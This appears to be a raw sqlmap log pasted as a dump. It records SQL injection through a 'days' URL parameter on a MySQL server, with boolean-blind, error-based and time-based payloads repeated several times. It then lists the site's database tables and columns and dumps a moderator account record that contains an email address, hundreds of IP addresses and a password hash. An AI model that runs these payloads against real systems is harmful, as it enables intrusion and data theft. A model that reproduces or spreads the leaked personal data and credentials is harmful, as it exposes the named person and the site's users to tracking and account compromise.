12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270370470570670770870971071171271371471571671771871972072172272372472572672772872973073173273373473573673773873974074174274374474574674774874975075175275375475575675775875976076176276376476576676776876977077177277377477577677777877978078178278378478578678778878979079179279379479579679779879980080180280380480580680780880981081181281381481581681781881982082182282382482582682782882983083183283383483583683783883984084184284384484584684784884985085185285385485585685785885986086186286386486586686786886987087187287387487587687787887988088188288388488588688788888989089189289389489589689789889990090190290390490590690790890991091191291391491591691791891992092192292392492592692792892993093193293393493593693793893994094194294394494594694794894995095195295395495595695795895996096196296396496596696796896997097197297397497597697797897998098198298398498598698798898999099199299399499599699799899910001001100210031004100510061007100810091010101110121013101410151016101710181019102010211022102310241025102610271028102910301031103210331034103510361037103810391040104110421043104410451046104710481049105010511052105310541055105610571058105910601061106210631064106510661067106810691070107110721073107410751076107710781079108010811082108310841085108610871088108910901091109210931094109510961097109810991100110111021103110411051106110711081109111011111112111311141115111611171118111911201121112211231124112511261127112811291130113111321133113411351136113711381139114011411142114311441145114611471148114911501151115211531154115511561157115811591160116111621163116411651166116711681169117011711172117311741175117611771178117911801181118211831184118511861187118811891190119111921193119411951196119711981199120012011202120312041205120612071208120912101211121212131214121512161217121812191220122112221223122412251226122712281229123012311232123312341235123612371238123912401241124212431244124512461247124812491250125112521253125412551256125712581259126012611262126312641265126612671268126912701271127212731274127512761277127812791280128112821283128412851286128712881289129012911292129312941295129612971298129913001301130213031304130513061307130813091310131113121313131413151316131713181319132013211322132313241325132613271328132913301331133213331334133513361337133813391340134113421343134413451346134713481349135013511352135313541355135613571358135913601361136213631364136513661367136813691370137113721373137413751376137713781379138013811382138313841385138613871388138913901391139213931394139513961397139813991400140114021403140414051406140714081409141014111412141314141415141614171418141914201421142214231424142514261427142814291430143114321433143414351436143714381439144014411442144314441445144614471448144914501451145214531454145514561457145814591460146114621463146414651466146714681469147014711472147314741475147614771478147914801481148214831484148514861487148814891490149114921493149414951496149714981499150015011502150315041505150615071508150915101511151215131514151515161517151815191520152115221523152415251526152715281529153015311532153315341535153615371538153915401541154215431544154515461547154815491550155115521553155415551556155715581559156015611562156315641565156615671568156915701571157215731574157515761577157815791580158115821583158415851586158715881589159015911592159315941595159615971598159916001601160216031604160516061607160816091610161116121613161416151616161716181619162016211622162316241625162616271628162916301631163216331634163516361637163816391640164116421643164416451646164716481649165016511652165316541655165616571658165916601661166216631664166516661667166816691670167116721673167416751676167716781679168016811682168316841685168616871688168916901691169216931694169516961697169816991700170117021703170417051706170717081709171017111712171317141715171617171718171917201721172217231724172517261727172817291730173117321733173417351736173717381739174017411742174317441745174617471748174917501751175217531754175517561757175817591760176117621763176417651766176717681769177017711772177317741775177617771778177917801781178217831784178517861787178817891790179117921793179417951796179717981799180018011802180318041805180618071808180918101811181218131814181518161817181818191820182118221823182418251826182718281829183018311832183318341835183618371838183918401841184218431844184518461847184818491850185118521853185418551856185718581859186018611862186318641865186618671868186918701871187218731874187518761877187818791880188118821883188418851886188718881889189018911892189318941895189618971898189919001901190219031904190519061907190819091910191119121913191419151916191719181919192019211922192319241925192619271928192919301931193219331934193519361937193819391940194119421943194419451946194719481949195019511952195319541955195619571958195919601961196219631964196519661967196819691970197119721973197419751976197719781979198019811982198319841985198619871988198919901991199219931994199519961997199819992000200120022003200420052006200720082009201020112012201320142015201620172018201920202021202220232024202520262027202820292030203120322033203420352036203720382039204020412042204320442045204620472048204920502051205220532054205520562057205820592060206120622063206420652066206720682069207020712072207320742075207620772078207920802081208220832084208520862087208820892090209120922093209420952096209720982099210021012102210321042105210621072108210921102111211221132114211521162117211821192120212121222123212421252126212721282129213021312132213321342135213621372138213921402141214221432144214521462147214821492150215121522153215421552156215721582159216021612162216321642165216621672168216921702171217221732174217521762177217821792180218121822183218421852186218721882189219021912192219321942195219621972198219922002201220222032204220522062207220822092210221122122213221422152216221722182219222022212222222322242225222622272228222922302231223222332234223522362237223822392240224122422243224422452246224722482249225022512252225322542255225622572258225922602261226222632264226522662267226822692270227122722273227422752276227722782279228022812282228322842285228622872288228922902291229222932294229522962297229822992300230123022303230423052306230723082309231023112312231323142315231623172318231923202321232223232324232523262327232823292330233123322333233423352336233723382339234023412342234323442345234623472348234923502351235223532354235523562357235823592360236123622363236423652366236723682369237023712372237323742375237623772378237923802381238223832384238523862387238823892390239123922393239423952396239723982399240024012402240324042405240624072408240924102411241224132414241524162417241824192420242124222423242424252426242724282429243024312432243324342435243624372438243924402441244224432444244524462447244824492450245124522453245424552456245724582459246024612462246324642465246624672468246924702471247224732474247524762477247824792480248124822483248424852486248724882489249024912492249324942495249624972498249925002501250225032504250525062507250825092510251125122513251425152516251725182519252025212522252325242525252625272528252925302531253225332534253525362537253825392540254125422543254425452546254725482549255025512552255325542555255625572558255925602561256225632564256525662567256825692570257125722573257425752576257725782579258025812582258325842585258625872588258925902591259225932594259525962597259825992600260126022603260426052606260726082609261026112612261326142615261626172618261926202621262226232624262526262627262826292630263126322633263426352636263726382639264026412642264326442645264626472648264926502651265226532654265526562657265826592660266126622663266426652666266726682669267026712672267326742675267626772678267926802681268226832684268526862687268826892690269126922693269426952696269726982699270027012702270327042705270627072708270927102711271227132714271527162717271827192720272127222723272427252726272727282729273027312732273327342735273627372738273927402741274227432744274527462747274827492750275127522753275427552756275727582759276027612762276327642765276627672768276927702771277227732774277527762777277827792780278127822783278427852786278727882789279027912792279327942795279627972798279928002801280228032804280528062807280828092810281128122813281428152816281728182819282028212822282328242825282628272828282928302831283228332834283528362837283828392840284128422843284428452846284728482849285028512852285328542855285628572858285928602861286228632864286528662867286828692870287128722873287428752876287728782879288028812882288328842885288628872888288928902891289228932894289528962897289828992900290129022903290429052906290729082909291029112912291329142915291629172918291929202921292229232924292529262927292829292930293129322933293429352936293729382939294029412942294329442945294629472948294929502951295229532954295529562957295829592960296129622963296429652966296729682969297029712972297329742975297629772978297929802981298229832984298529862987298829892990299129922993299429952996299729982999300030013002300330043005300630073008300930103011301230133014301530163017301830193020302130223023302430253026302730283029303030313032303330343035303630373038303930403041304230433044304530463047304830493050305130523053305430553056305730583059306030613062306330643065306630673068306930703071307230733074307530763077307830793080308130823083308430853086308730883089309030913092309330943095309630973098309931003101310231033104310531063107310831093110311131123113311431153116311731183119312031213122312331243125312631273128312931303131313231333134313531363137313831393140314131423143314431453146314731483149315031513152315331543155315631573158315931603161316231633164316531663167316831693170317131723173317431753176317731783179318031813182318331843185318631873188318931903191319231933194319531963197319831993200320132023203320432053206320732083209321032113212321332143215321632173218321932203221322232233224322532263227322832293230323132323233323432353236323732383239324032413242324332443245324632473248324932503251325232533254325532563257325832593260326132623263326432653266326732683269327032713272327332743275327632773278327932803281328232833284328532863287328832893290329132923293329432953296329732983299330033013302330333043305330633073308330933103311331233133314331533163317331833193320332133223323332433253326332733283329333033313332333333343335333633373338333933403341334233433344334533463347334833493350335133523353335433553356335733583359336033613362336333643365336633673368336933703371337233733374337533763377337833793380338133823383338433853386338733883389339033913392339333943395339633973398339934003401340234033404340534063407340834093410341134123413341434153416341734183419342034213422342334243425342634273428342934303431343234333434343534363437343834393440344134423443344434453446344734483449345034513452345334543455345634573458345934603461346234633464346534663467346834693470347134723473347434753476347734783479348034813482348334843485348634873488348934903491349234933494349534963497349834993500350135023503350435053506350735083509351035113512351335143515351635173518351935203521352235233524352535263527352835293530353135323533353435353536353735383539354035413542354335443545354635473548354935503551355235533554355535563557355835593560356135623563356435653566356735683569357035713572357335743575357635773578357935803581358235833584358535863587358835893590359135923593359435953596359735983599360036013602360336043605360636073608360936103611361236133614361536163617361836193620362136223623362436253626362736283629363036313632363336343635363636373638363936403641364236433644364536463647364836493650365136523653365436553656365736583659366036613662366336643665366636673668366936703671367236733674367536763677367836793680368136823683368436853686368736883689369036913692369336943695369636973698369937003701370237033704370537063707370837093710371137123713371437153716371737183719372037213722372337243725372637273728372937303731373237333734373537363737373837393740374137423743374437453746374737483749375037513752375337543755375637573758375937603761376237633764376537663767376837693770377137723773377437753776377737783779378037813782378337843785378637873788378937903791379237933794379537963797379837993800380138023803380438053806380738083809381038113812381338143815381638173818381938203821382238233824382538263827382838293830383138323833383438353836383738383839384038413842384338443845384638473848384938503851385238533854385538563857385838593860386138623863386438653866386738683869387038713872387338743875387638773878387938803881388238833884388538863887388838893890389138923893389438953896389738983899390039013902390339043905390639073908390939103911391239133914391539163917391839193920392139223923392439253926392739283929393039313932393339343935393639373938393939403941394239433944394539463947394839493950395139523953395439553956395739583959396039613962396339643965396639673968396939703971397239733974397539763977397839793980398139823983398439853986398739883989399039913992399339943995399639973998399940004001400240034004400540064007400840094010401140124013401440154016401740184019402040214022402340244025402640274028402940304031403240334034403540364037403840394040404140424043404440454046404740484049405040514052405340544055405640574058405940604061406240634064406540664067406840694070407140724073407440754076407740784079408040814082408340844085408640874088408940904091409240934094409540964097409840994100410141024103410441054106410741084109411041114112411341144115411641174118411941204121412241234124412541264127412841294130413141324133413441354136413741384139414041414142414341444145414641474148414941504151415241534154415541564157415841594160416141624163416441654166416741684169417041714172417341744175417641774178417941804181418241834184418541864187418841894190419141924193419441954196419741984199420042014202420342044205420642074208420942104211421242134214421542164217421842194220422142224223422442254226422742284229423042314232423342344235423642374238423942404241424242434244424542464247424842494250425142524253425442554256425742584259426042614262426342644265426642674268426942704271427242734274427542764277427842794280428142824283428442854286428742884289429042914292429342944295429642974298429943004301430243034304430543064307430843094310431143124313431443154316431743184319432043214322432343244325432643274328432943304331433243334334433543364337433843394340434143424343434443454346434743484349435043514352435343544355435643574358435943604361436243634364436543664367436843694370437143724373437443754376437743784379438043814382438343844385438643874388438943904391439243934394439543964397439843994400440144024403440444054406440744084409441044114412441344144415441644174418441944204421442244234424442544264427442844294430443144324433443444354436443744384439
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[3 tables]
+-------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
+-------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: backend
Table: banned_users
[25 columns]
+-------------+----------------------+
| Column | Type |
+-------------+----------------------+
| 4pass_id | varchar(10) |
| global | tinyint(1) unsigned |
| no | int(11) unsigned |
| active | tinyint(1) unsigned |
| admin | varchar(50) |
| admin_ip | char(15) |
| board | varchar(6) |
| host | char(15) |
| length | timestamp |
| md5 | char(32) |
| name | varchar(255) |
| now | timestamp |
| password | varchar(255) |
| post_json | text |
| post_num | int(11) unsigned |
| post_time | timestamp |
| reason | text |
| reverse | varchar(255) |
| rule | char(8) |
| template_id | smallint(4) unsigned |
| tripcode | varchar(255) |
| unbannedby | varchar(50) |
| unbannedon | timestamp |
| xff | varchar(255) |
| zonly | tinyint(1) unsigned |
+-------------+----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from mod_users where username='moot' [1]:
[*] admin, all, , moot@4chan.org, developer, 2, {"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.248.62.213":0,"69.86.243.13":0,"166.248.1.133":0,"166.248.0.68":0,"166.248.0.24":0,"166.248.0.186":0,"69.86.148.49":0,"219.118.120.8":0,"221.243.26.164":0,"98.210.16.87":0,"50.74.4.178":0,"69.86.148.14":0,"69.86.243.215":0,"67.250.2.243":0,"67.247.29.46":0,"72.43.166.86":0,"208.72.142.22":0,"62.50.198.117":0,"173.245.52.148":0,"98.92.19.86":0,"66.154.114.131":0,"75.37.27.159":0,"208.105.85.202":0,"71.56.181.126":0,"166.248.0.45":0,"208.105.85.213":0,"166.248.18.239":0,"199.106.164.67":0,"166.250.64.50":0,"166.250.71.62":0,"199.106.164.81":0,"208.105.86.3":0,"77.108.161.2":0,"166.248.6.82":0,"70.192.129.3":0,"166.248.1.140":0,"98.117.95.116":0,"173.67.243.126":0,"70.195.192.255":0,"70.195.192.177":0,"70.195.193.29":0,"70.195.192.170":0,"199.106.166.38":0,"70.192.67.24":0,"78.250.183.45":0,"92.226.32.8":0,"92.225.85.52":0,"37.14.171.58":0,"37.14.165.35":0,"79.157.233.162":0,"70.199.129.37":0,"70.199.130.89":0,"70.199.128.176":0,"70.199.130.35":0,"70.199.132.13":0,"166.137.86.235":0,"199.106.164.69":0,"70.197.2.94":0,"70.197.1.138":0,"70.197.0.171":0,"70.197.6.193":0,"71.202.19.140":1393747152,"199.188.194.152":0,"70.197.5.255":0,"199.106.164.77":0,"78.24.18.2":0,"70.197.145.30":0,"66.63.164.214":0,"205.214.226.18":0,"199.188.194.149":0,"69.181.70.170":1393806830,"208.105.86.32":0,"199.106.165.60":0,"98.173.88.102":0,"199.106.165.104":0,"70.192.68.171":0,"199.106.164.82":0,"123.224.230.25":0,"111.191.218.214":0,"113.39.75.70":0,"1.114.221.40":0,"1.114.240.119":0,"203.141.139.162":0,"72.89.40.62":0,"204.152.204.156":0,"204.152.204.165":0,"108.182.31.184":0,"216.214.189.162":0,"216.4.227.71":0,"70.197.68.90":0,"208.115.81.243":0,"70.197.65.64":0,"70.197.65.104":0,"70.199.77.80":0,"70.199.80.225":0,"70.199.83.110":0,"70.199.88.61":0,"70.199.85.170":0,"173.245.57.22":0,"199.106.164.73":0,"70.192.68.129":0,"70.192.86.67":0,"70.196.65.112":0,"70.196.64.92":0,"70.196.66.140":0,"70.196.66.242":0,"96.238.184.54":0,"76.104.11.43":0,"24.44.231.99":0,"160.39.171.85":0,"70.192.76.61":0,"70.192.92.159":0,"66.216.9.130":0,"70.192.75.25":0,"70.192.97.128":0,"70.192.73.188":0,"198.228.194.64":0,"166.147.110.136":0,"166.147.109.87":0,"114.164.237.233":0,"222.151.98.81":0,"166.147.109.232":0,"36.245.210.248":0,"166.147.110.78":0,"101.128.197.51":0,"166.147.111.120":0,"166.147.109.106":0,"166.147.111.131":0,"166.147.110.237":0,"183.177.175.203":0,"123.230.73.94":0,"166.147.110.132":0,"70.192.83.220":0,"66.108.63.147":0,"198.228.205.2":0,"198.228.207.58":0,"198.228.204.24":0,"198.228.207.121":0,"198.228.204.18":0,"198.228.207.59":0,"198.228.204.63":0,"166.147.110.105":0,"166.147.111.105":0,"82.69.8.53":0,"166.147.108.56":0,"166.147.108.90":0,"91.85.229.107":0,"166.147.108.161":0,"217.41.228.62":0,"198.228.205.42":0,"10.0.0.19":1397794249,"198.228.192.65":0,"70.192.72.85":0,"70.192.65.112":0,"70.192.64.22":0,"70.192.68.50":0,"207.237.196.229":0,"70.192.64.236":0,"70.192.86.154":0,"198.228.204.131":0,"70.192.86.57":0,"74.66.8.191":0,"70.192.99.42":0,"70.192.96.242":0,"198.228.207.211":0,"70.192.86.66":0,"198.228.207.150":0,"70.192.96.192":0,"70.192.74.1":0,"71.212.124.188":0,"70.199.133.11":0,"70.199.137.94":0,"70.199.137.114":0,"70.199.137.156":0,"70.199.128.76":0,"70.199.248.4":0,"70.199.224.195":0,"166.147.81.136":0,"70.199.130.200":0,"12.130.106.101":0,"198.228.207.19":0,"198.228.207.145":0,"198.228.204.85":0,"198.228.205.46":0,"198.228.205.143":0,"198.228.207.86":0,"70.192.68.176":0,"70.192.72.154":0,"70.192.64.80":0,"69.124.62.42":0,"70.192.74.115":0,"70.208.72.61":0,"70.208.80.72":0,"85.114.63.138":0,"76.15.59.112":0,"96.238.98.52":0,"70.208.65.116":0,"199.108.71.44":0,"67.139.178.66":0,"199.223.125.130":0,"199.106.166.130":0,"199.106.166.95":0,"199.106.166.10":0,"70.193.132.88":0,"70.193.128.160":0,"70.193.129.178":0,"70.193.136.155":0,"63.133.202.2":0,"70.193.128.219":0,"199.106.165.150":0,"70.208.66.77":0,"70.208.69.81":0,"70.208.64.178":0,"70.208.65.132":0,"70.208.84.252":0,"74.66.10.29":0,"208.105.84.100":0,"198.255.178.112":1397922202,"70.208.86.25":0,"70.208.77.209":0,"70.197.5.20":0,"70.197.5.53":0,"71.141.96.58":0,"70.197.4.200":0,"199.106.164.74":0,"70.208.75.54":0,"198.255.177.61":1393278939,"71.141.96.56":0,"117.55.65.136":0,"117.55.65.133":0,"117.55.65.134":0,"153.120.206.224":1396625609,"117.55.65.135":0,"49.240.26.214":0,"153.120.232.253":0,"70.208.76.201":0,"71.141.103.1":0,"209.118.237.69":0,"70.197.14.104":0,"70.197.0.52":0,"70.197.10.243":0,"70.197.3.113":0,"70.197.15.65":0,"70.197.5.47":0,"205.154.255.206":0,"199.106.164.80":0,"24.90.234.161":1392868758,"199.106.165.16":1393351969,"71.118.69.99":1393436027,"50.131.222.48":1395516029,"2600:1010:b020:6f57:656e:e597:1966:ec2f":1393748114,"70.197.4.102":1393748151,"70.197.12.52":1393787071,"2600:1010:b003:c7ac:2c45:25d:7157:cdfc":1393787087,"24.43.227.7":1394225684,"70.210.128.135":1394268733,"2600:100f:b10e:d3b4:7498:7a7:54b2:7e67":1394262217,"72.234.2.242":1394346178,"70.210.129.162":1394359543,"2600:100f:b11b:2f9e:341b:95ff:37ff:833":1394400970,"70.210.133.231":1394398934,"98.147.124.68":1394418703,"173.197.107.7":1394486191,"2600:100f:b128:db5a:41ac:a4ee:36ab:34e":1394505489,"2600:100f:b11d:1b77:809c:42b:7f4f:3b37":1394513983,"70.210.133.2":1394575048,"2600:100f:b12e:2b8:d1ec:4926:635d:339":1394522956,"70.210.132.44":1394585200,"64.129.1.15":1394656562,"64.129.1.11":1394913797,"70.210.134.50":1394927948,"50.67.162.78":1395387193,"2600:1001:b110:835e:a5c6:96d3:f0db:d8d9":1395621867,"219.166.9.153":1396485863,"111.189.249.53":1396552281,"111.189.248.80":1396625716,"111.189.185.89":1396663246,"111.189.249.126":1396701836,"111.189.184.191":1396713107,"111.189.248.87":1396778806,"111.189.184.206":1396806993,"111.189.249.179":1396841910,"111.189.185.67":1396860723,"111.189.184.218":1396893728,"111.189.184.61":1396931109,"111.189.249.174":1396959967,"70.208.77.101":1397071823,"2600:1001:b119:1a8e:905d:ebf6:3dee:76ed":1397071637,"198.228.207.195":1397583760,"198.228.204.169":1397864032,"98.14.45.231":1397864143,"124.181.137.61":1397921454,"121.219.238.59":1397924151}, 0, 2014-04-15 09:01:23, $2y$10$FB7uBnej86SqGsYfrHfM7ulcDk7XGYvM3MzbMFMIFRljbsH/ZMjpS, 0, moot
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
